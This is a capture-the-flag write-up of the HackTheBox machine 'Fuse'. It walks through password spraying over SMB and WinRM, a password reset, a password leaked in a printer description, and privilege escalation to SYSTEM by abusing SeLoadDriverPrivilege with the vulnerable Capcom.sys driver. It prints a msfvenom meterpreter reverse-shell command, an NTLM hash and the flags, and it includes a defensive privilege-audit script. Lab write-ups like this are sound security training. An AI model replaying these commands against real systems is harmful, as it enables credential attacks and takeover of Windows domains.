HackTheBox Fuse protected writeup by: https://0xprashant.github.io/posts/htb-fuse/
Introduction@Fuse:~$
Column | Details |
---|---|
Name | Fuse |
IP | 10.10.10.193 |
Points | 30 |
OS | Windows |
Difficulty | Medium |
Creator | aas |
Out On | 13 June 2020 |
Brief@Fuse:~$
Got a few usernames from the Excel files hosted on the website itself and built a custom wordlist from the website using cewl. Password spraying with Metasploit on the SMB protocol gave the correct username and password. Changed the password using smbpasswd and logged in to rpcclient. Enumerating the printers returned a password in the result. Password spraying again with crackmapexec on the WinRM protocol gave the username associated with it, and I logged in using evil-winrm. The user is privileged to load drivers, so, following an article, I compiled the necessary files using Visual Studio and exploited SeLoadDriverPrivilege to get a shell as administrator.
Summary :~$
- Got domain from enum4linux
- Reading the Excel files got from the website
- Making a users.txt file for the users got from the Excel files
- Making a custom wordlist using cewl from the website itself
- Bruteforce the SMB protocol using Metasploit and Medusa
- Using smbpasswd to reset the password of the user tlavel
- Enumerating shares
- Using rpcclient to enumerate users
- Got printer information and a password from the enumprinters query
- Login as svc-print
- Got user.txt
- Privilege escalation by abusing SeLoadDriverPrivilege
- Compiling all the files
- Generating a msf malicious file
- Creating the registry key for the file capcom.sys using eoploaddriver.exe
- Executing ExploitCapcom.exe to run shell.exe
- Got shell as admin
- Got root.txt
Pwned
```
➜ fuse evil-winrm -u Administrator -H 370ddcf45959b2293427baa70376e14e -i fuse.htb

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint
```
Recon
Nmap
```
➜ fuse nmap -sV -sC -v -T4 -oA scans/nmap.full -p- fuse.htb
# Nmap 7.80 scan initiated Sat Jun 13 21:00:25 2020 as: nmap -sV -sC -v -T4 -oA scans/nmap.full -p- fuse.htb
Nmap scan report for fuse.htb (10.10.10.193)
Host is up (0.34s latency).
Not shown: 65514 filtered ports
PORT      STATE SERVICE      VERSION
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-14 01:19:23Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49669/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc        Microsoft Windows RPC
49672/tcp open  msrpc        Microsoft Windows RPC
49690/tcp open  msrpc        Microsoft Windows RPC
49743/tcp open  msrpc        Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=6/13%Time=5EE5780A%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: FUSE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h33m10s, deviation: 4h02m31s, median: 13m08s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Fuse
|   NetBIOS computer name: FUSE\x00
|   Domain name: fabricorp.local
|   Forest name: fabricorp.local
|   FQDN: Fuse.fabricorp.local
|_  System time: 2020-06-13T18:21:53-07:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-06-14T01:21:55
|_  start_date: 2020-06-13T19:13:43

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jun 13 21:11:22 2020 -- 1 IP address (1 host up) scanned in 657.60 seconds
```
Many ports are open; the interesting ones are DNS, SMB, WinRM and HTTP.
Port 80 (HTTP)
fuse.htb redirects to fuse.fabricorp.local, so I added that name to the /etc/hosts file. After adding it and refreshing, there is a PaperCut print-log page running on this HTTP port, and there are also some Excel files.
Download the Excel files
I downloaded all three files and opened them.
These files contain some usernames; I extracted them all and saved them in users.txt.
SMB Protocol
I checked whether anonymous login is allowed on SMB.
```
➜ prashant smbclient -L fuse.htb
Enter WORKGROUP\root's password:
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available
```
Okay, so anonymous login is allowed, but we cannot list the shares.
Enum4linux
```
➜ prashant enum4linux fuse.htb
Domain Name: FABRICORP
```
Got nothing other than the domain name: FABRICORP.
Password spraying on the SMB protocol
users.txt
```
➜ fuse cat users.txt
pmerton
tlavel
sthompson
bhult
```
Now what ??
After some time I decided to build a custom wordlist from the website using cewl so I could brute-force the login on the SMB protocol.
```
➜ fuse cewl -d 5 -m 3 -w wordlist http://fuse.fabricorp.local/papercut/logs/html/index.htm --with-numbers
CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
```
I tried password spraying with the same users.txt file using Metasploit on the SMB protocol.
Using metasploit
The module I used in msf to brute-force the login is auxiliary/scanner/smb/smb_login.
```
msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > set pass_file wordlist
pass_file => wordlist
msf5 auxiliary(scanner/smb/smb_login) > set USER_file users.txt
USER_file => users.txt
msf5 auxiliary(scanner/smb/smb_login) > set RHOSTS fuse.htb
RHOSTS => fuse.htb
msf5 auxiliary(scanner/smb/smb_login) >
msf5 auxiliary(scanner/smb/smb_login) > run

[+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\tlavel:Fabricorp01'
[+] 10.10.10.193:445      - 10.10.10.193:445 - Success: '.\bhult:Fabricorp01'
```
Using medusa
```
➜ fuse medusa -h fuse.htb -U users.txt -P wordlist -M smbnt
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT FOUND: [smbnt] Host: fuse.htb User: tlavel Password: Fabricorp01 [SUCCESS (0x000224:STATUS_PASSWORD_MUST_CHANGE)]
ACCOUNT FOUND: [smbnt] Host: fuse.htb User: bhult Password: Fabricorp01 [SUCCESS (0x000224:STATUS_PASSWORD_MUST_CHANGE)]
```
As I can see, the password Fabricorp01 got SUCCESS for both users tlavel and bhult, but the result also says STATUS_PASSWORD_MUST_CHANGE.
Login using smbclient
```
➜ fuse smbclient -L fuse.htb -U tlavel
Enter WORKGROUP\tlavel's password:
session setup failed: NT_STATUS_LOGON_FAILURE
```
But I got the same error as previously in Medusa. Well, we can reset a user's password on a remote machine with smbpasswd if we know the old password, and since I know it, I can simply change the password.
Changing smb password
```
➜ fuse smbpasswd -r fuse.htb -U tlavel
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user tlavel on fuse.htb.
```
And now I can list the shares as user tlavel.
```
➜ fuse smbclient -L fuse.htb -U tlavel
Enter WORKGROUP\tlavel's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        HP-MFT01        Printer   HP-MFT01
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        print$          Disk      Printer Drivers
        SYSVOL          Disk      Logon server share
SMB1 disabled -- no workgroup available
```
After enumerating all the shares I got nothing useful, or at least I could not figure out what I needed.
Enumerating using rpcclient
I can reset the password again and log in to rpcclient.
```
➜ fuse rpcclient -U FABRICORP\\tlavel 10.10.10.193
Enter FABRICORP\tlavel's password:
rpcclient $>
```
Enum users
```
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]
rpcclient $>
```
Okay, so I got some usernames here and saved them to another file called users.
```
rpcclient $> enumprivs
found 35 privileges

SeCreateTokenPrivilege                    0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege             0:3 (0x0:0x3)
SeLockMemoryPrivilege                     0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege                  0:5 (0x0:0x5)
SeMachineAccountPrivilege                 0:6 (0x0:0x6)
SeTcbPrivilege                            0:7 (0x0:0x7)
SeSecurityPrivilege                       0:8 (0x0:0x8)
SeTakeOwnershipPrivilege                  0:9 (0x0:0x9)
SeLoadDriverPrivilege                     0:10 (0x0:0xa)
SeSystemProfilePrivilege                  0:11 (0x0:0xb)
SeSystemtimePrivilege                     0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege           0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege           0:14 (0x0:0xe)
SeCreatePagefilePrivilege                 0:15 (0x0:0xf)
SeCreatePermanentPrivilege                0:16 (0x0:0x10)
SeBackupPrivilege                         0:17 (0x0:0x11)
SeRestorePrivilege                        0:18 (0x0:0x12)
SeShutdownPrivilege                       0:19 (0x0:0x13)
SeDebugPrivilege                          0:20 (0x0:0x14)
SeAuditPrivilege                          0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege              0:22 (0x0:0x16)
SeChangeNotifyPrivilege                   0:23 (0x0:0x17)
SeRemoteShutdownPrivilege                 0:24 (0x0:0x18)
SeUndockPrivilege                         0:25 (0x0:0x19)
SeSyncAgentPrivilege                      0:26 (0x0:0x1a)
SeEnableDelegationPrivilege               0:27 (0x0:0x1b)
SeManageVolumePrivilege                   0:28 (0x0:0x1c)
SeImpersonatePrivilege                    0:29 (0x0:0x1d)
SeCreateGlobalPrivilege                   0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege           0:31 (0x0:0x1f)
SeRelabelPrivilege                        0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege             0:33 (0x0:0x21)
SeTimeZonePrivilege                       0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege             0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege 0:36 (0x0:0x24)
rpcclient $>
```
The user has some pretty good privileges on the machine.
The website was about printers, so it is better to do some enumeration on the printers.
```
        adddriver             Add a print driver
        addprinter            Add a printer
        deldriver             Delete a printer driver
        deldriverex           Delete a printer driver with files
        enumdata              Enumerate printer data
        enumdataex            Enumerate printer data for a key
        enumkey               Enumerate printer keys
        enumjobs              Enumerate print jobs
        getjob                Get print job
        setjob                Set print job
        enumports             Enumerate printer ports
        enumdrivers           Enumerate installed printer drivers
        enumprinters          Enumerate printers
        getdata               Get print driver data
        getdataex             Get printer driver data with keyname
        getdriver             Get print driver information
        getdriverdir          Get print driver upload directory
        getdriverpackagepath  Get print driver package download directory
        getprinter            Get printer info
        openprinter           Open printer handle
        openprinter_ex        Open printer handle
        setdriver             Set printer driver
        getprintprocdir       Get print processor directory
        addform               Add form
        setform               Set form
        getform               Get form
        deleteform            Delete form
        enumforms             Enumerate forms
        setprinter            Set printer comment
        setprintername        Set printername
        setprinterdata        Set REG_SZ printer data
        rffpcnex              Rffpcnex test
        printercmp            Printer comparison test
        enumprocs             Enumerate Print Processors
        enumprocdatatypes     Enumerate Print Processor Data Types
        enummonitors          Enumerate Print Monitors
        createprinteric       Create Printer IC
```
There are some useful commands regarding the printers:

```
enumprinters          Enumerate printers
```

I can list and enumerate the printers by using enumprinters:
```
rpcclient $> enumprinters
        flags:[0x800000]
        name:[\\10.10.10.193\HP-MFT01]
        description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
        comment:[]
rpcclient $>
```
And here I got lucky: there is a password in the printer description, $fab@s3Rv1ce$1.
Username spraying on winrm protocol
Now, since the WinRM port is open, I can use crackmapexec or Metasploit to spray this password against the usernames I got from rpcclient with enumdomusers.
Using metasploit
```
msf5 auxiliary(scanner/winrm/winrm_login) > set PASSWORD '$fab@s3Rv1ce$1'
PASSWORD => $fab@s3Rv1ce$1
msf5 auxiliary(scanner/winrm/winrm_login) > set USER_FILE users
USER_FILE => users
msf5 auxiliary(scanner/winrm/winrm_login) > set RHOSTS 10.10.10.193
RHOSTS => 10.10.10.193
msf5 auxiliary(scanner/winrm/winrm_login) >
msf5 auxiliary(scanner/winrm/winrm_login) > run

[!] No active DB -- Credential data will not be saved!
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\DefaultAccount:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\Administrator:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\krbtgt:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\pmerton:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\tlavel:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\sthompson:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\bhult:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\bnielson:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\dandrews:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\mberbatov:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\astein:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\dmuir:$fab@s3Rv1ce$1 (Incorrect: )
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\svc-scan:$fab@s3Rv1ce$1 (Incorrect: )
[+] 10.10.10.193:5985 - Login Successful: WORKSTATION\svc-print:$fab@s3Rv1ce$1
[-] 10.10.10.193:5985 - LOGIN FAILED: WORKSTATION\Guest:$fab@s3Rv1ce$1 (Incorrect: )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```
Using crackmapexec
```
➜ fuse crackmapexec winrm -u users -p '$fab@s3Rv1ce$1' -d FABRICORP fuse.htb
WINRM       10.10.10.193    5985   fuse.htb         [*] http://10.10.10.193:5985/wsman
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\DefaultAccount:$fab@s3Rv1ce$1 "Failed to authenticate the user DefaultAccount with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\Administrator:$fab@s3Rv1ce$1 "Failed to authenticate the user Administrator with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\krbtgt:$fab@s3Rv1ce$1 "Failed to authenticate the user krbtgt with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\pmerton:$fab@s3Rv1ce$1 "Failed to authenticate the user pmerton with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\tlavel:$fab@s3Rv1ce$1 "Failed to authenticate the user tlavel with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\sthompson:$fab@s3Rv1ce$1 "Failed to authenticate the user sthompson with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\bhult:$fab@s3Rv1ce$1 "Failed to authenticate the user bhult with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\bnielson:$fab@s3Rv1ce$1 "Failed to authenticate the user bnielson with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\dandrews:$fab@s3Rv1ce$1 "Failed to authenticate the user dandrews with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\mberbatov:$fab@s3Rv1ce$1 "Failed to authenticate the user mberbatov with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\astein:$fab@s3Rv1ce$1 "Failed to authenticate the user astein with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\dmuir:$fab@s3Rv1ce$1 "Failed to authenticate the user dmuir with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [-] FABRICORP\svc-scan:$fab@s3Rv1ce$1 "Failed to authenticate the user svc-scan with ntlm"
WINRM       10.10.10.193    5985   fuse.htb         [+] FABRICORP\svc-print:$fab@s3Rv1ce$1 (Pwn3d!)
```
The user is svc-print, and I can log in to the machine using evil-winrm.
```
➜ fuse evil-winrm -u svc-print -p '$fab@s3Rv1ce$1' -i fuse.htb

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami
fabricorp\svc-print
```
Got user.txt
```
*Evil-WinRM* PS C:\Users\svc-print\desktop> type user.txt
3148b09cce76eee40d9bc602744269c1
```
Privilege escalation
Now it's time to escalate privileges.
whoami /all
```
*Evil-WinRM* PS C:\Users\svc-print\desktop> whoami /all

USER INFORMATION
----------------

User Name           SID
=================== ==============================================
fabricorp\svc-print S-1-5-21-2633719317-1471316042-3957863514-1104

GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
FABRICORP\IT_Accounts                      Group            S-1-5-21-2633719317-1471316042-3957863514-1604 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\svc-print\desktop>
```
This permission looks very suspicious:

```
SeLoadDriverPrivilege         Load and unload device drivers Enabled
```
A quick Google search showed me a good article on this:
https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
The article shows that we can load our own drivers and run a specific command as admin, since we are already privileged to load drivers.
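The whoami /all output above also explains where the privilege comes from: svc-print is a member of BUILTIN\Print Operators, and the default user-rights assignment on a domain controller grants that group "Load and unload device drivers". As an added example, not from the original writeup, the Python below parses whoami /all output and flags the privileges and built-in group memberships that make a token administrator-equivalent; the sample is constructed from the output shown above, and the privilege shortlist is a common defender checklist rather than anything from the page.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Privileges that on their own let the holder escalate to SYSTEM/administrator.
HIGH_IMPACT_PRIVILEGES: Dict[str, str] = {
    "SeLoadDriverPrivilege": "load a kernel driver, including a known-vulnerable signed one",
    "SeDebugPrivilege": "open and manipulate any process, including SYSTEM processes",
    "SeImpersonatePrivilege": "impersonate another user's token",
    "SeAssignPrimaryTokenPrivilege": "start a process with another user's primary token",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeBackupPrivilege": "read any file regardless of its ACL",
    "SeRestorePrivilege": "write any file regardless of its ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeCreateTokenPrivilege": "forge arbitrary access tokens",
}

# Built-in groups whose default rights on a domain controller include one of the
# privileges above (Print Operators receives SeLoadDriverPrivilege).
SENSITIVE_GROUPS = {
    "BUILTIN\\Administrators", "BUILTIN\\Print Operators",
    "BUILTIN\\Backup Operators", "BUILTIN\\Server Operators",
}

# Constructed sample: the GROUP and PRIVILEGES sections of the `whoami /all`
# output shown above (a few groups dropped to keep the sample short).
SAMPLE_WHOAMI_ALL = r"""
GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ==================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators                    Alias            S-1-5-32-550                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
FABRICORP\IT_Accounts                      Group            S-1-5-21-2633719317-1471316042-3957863514-1604 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""

# whoami sizes its columns to the longest entry, so the parser keys on the Type
# and SID/State columns instead of fixed offsets.
GROUP_RE = re.compile(r"^(\S.*?)\s+(Well-known group|Alias|Group|Label)\s+(S-1-[\d-]+)")
PRIV_RE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


@dataclass
class TokenInfo:
    groups: List[Tuple[str, str]]   # (group name, SID)
    privileges: Dict[str, str]      # privilege name -> "Enabled" / "Disabled"


def parse_whoami_all(text: str) -> TokenInfo:
    """Extract group memberships and privileges from `whoami /all` output."""
    info = TokenInfo(groups=[], privileges={})
    for line in text.splitlines():
        g = GROUP_RE.match(line)
        if g:
            info.groups.append((g.group(1), g.group(3)))
            continue
        p = PRIV_RE.match(line)
        if p:
            info.privileges[p.group(1)] = p.group(3)
    return info


def audit_token(info: TokenInfo) -> List[str]:
    """List every reason this token should be treated as administrator-equivalent."""
    findings: List[str] = []
    for priv, state in info.privileges.items():
        if priv in HIGH_IMPACT_PRIVILEGES:
            findings.append(f"{priv} is {state}: holder can {HIGH_IMPACT_PRIVILEGES[priv]}")
    for name, sid in info.groups:
        if name in SENSITIVE_GROUPS:
            findings.append(f"member of {name} ({sid})")
    return findings


if __name__ == "__main__":
    for finding in audit_token(parse_whoami_all(SAMPLE_WHOAMI_ALL)):
        print("[!]", finding)
```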
Compiling files
What I am going to do first is compile the two files:
- eoploaddriver.cpp: https://raw.githubusercontent.com/TarlogicSecurity/EoPLoadDriver/master/eoploaddriver.cpp
- ExploitCapcom.cpp: https://github.com/tandasat/ExploitCapcom
I compiled both files using Visual Studio and got the exe files. We need to specify our command in ExploitCapcom.cpp at line 292, in the function LaunchShell():
```cpp
static bool LaunchShell()
{
    TCHAR CommandLine[] = TEXT("C:\\Windows\\system32\\cmd.exe");
```
I changed the command to my own, C:\test\shell.exe, so it runs the binary created by msfvenom:
```cpp
static bool LaunchShell()
{
    TCHAR CommandLine[] = TEXT("C:\\test\\shell.exe");
```
And one more file, capcom.sys:
https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys
Now first we need to create shell.exe using msfvenom.
Creating the malicious file
```
➜ files msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.4 LPORT=4444 -f exe > shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
```
And then upload all four files to the machine.
Uploading files
After uploading all four files...
Now create the registry key under HKEY_CURRENT_USER (HKCU) and set the driver configuration settings. The driver will be the file capcom.sys, given by its absolute path.
Exploitation
```
*Evil-WinRM* PS C:\test> .\eoploaddriver.exe System\CurrentControlSet\MyService C:\test\capcom.sys
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-2633719317-1471316042-3957863514-1104\System\CurrentControlSet\MyService
NTSTATUS: 00000000, WinError: 0
```
Now start a listener in Metasploit and run .\ExploitCapcom.exe for the final exploitation. Execute the NtLoadDriver function, specifying the registry key created previously:
```
*Evil-WinRM* PS C:\test> .\ExploitCapcom.exe
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 000002B6CF0B0008
[+] Shellcode was executed
[+] Token stealing was successful
[+] The SYSTEM shell was launched
[*] Press any key to exit this program
*Evil-WinRM* PS C:\test>
```
And on our listener we got the shell as admin.
```
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.4:4444
[*] Sending stage (176195 bytes) to 10.10.10.193
[*] Meterpreter session 1 opened (10.10.14.4:4444 -> 10.10.10.193:50134) at 2020-06-17 02:27:11 -0400

meterpreter > shell
Process 576 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\test>whoami
whoami
nt authority\system
```
Got root.txt
```
C:\Users\Administrator\Desktop>type root.txt
type root.txt
39bb8e320aecfcdd345fc2e7be64ceb7

C:\Users\Administrator\Desktop>
```
And we pwned it.
If you liked the writeup, support a poor student to get the OSCP cert: Donation for OSCP
Resources
Topic | Url |
---|---|
Article on seloaddriverprivilege | https://www.tarlogic.com/en/blog/abusing-seloaddriverprivilege-for-privilege-escalation/ |
eoploaddriver.cpp | https://raw.githubusercontent.com/TarlogicSecurity/EoPLoadDriver/master/eoploaddriver.cpp |
ExploitCapcom.cpp | https://github.com/tandasat/ExploitCapcom |
capcom.sys | https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys |
Below, puckie's way
First an nmap scan
```
E:\PENTEST>nmap 10.10.10.193
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-17 11:38 W. Europe Summer Time
Nmap scan report for fuse.fabricorp.local (10.10.10.193)
Host is up (0.089s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl

Nmap done: 1 IP address (1 host up) scanned in 19.86 seconds

E:\PENTEST>
```
enumerate more
```
root@kali:~/htb/fuse# nmap -p53,80,88,135,139,389,445,3389 -A -T4 fabricorp.local
Starting Nmap 7.70 ( https://nmap.org ) at 2020-06-17 05:56 EDT
Nmap scan report for fabricorp.local (10.10.10.193)
Host is up (0.086s latency).
rDNS record for 10.10.10.193: fuse.fabricorp.local

PORT     STATE    SERVICE       VERSION
53/tcp   open     domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp   open     http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html).
88/tcp   open     kerberos-sec  Microsoft Windows Kerberos (server time: 2020-06-17 10:13:52Z)
135/tcp  open     msrpc         Microsoft Windows RPC
139/tcp  open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: fabricorp.local, Site: Default-First-Site-Name)
445/tcp  open     microsoft-ds  Windows Server 2016 Standard 14393 microsoft-ds (workgroup: FABRICORP)
3389/tcp filtered ms-wbt-server
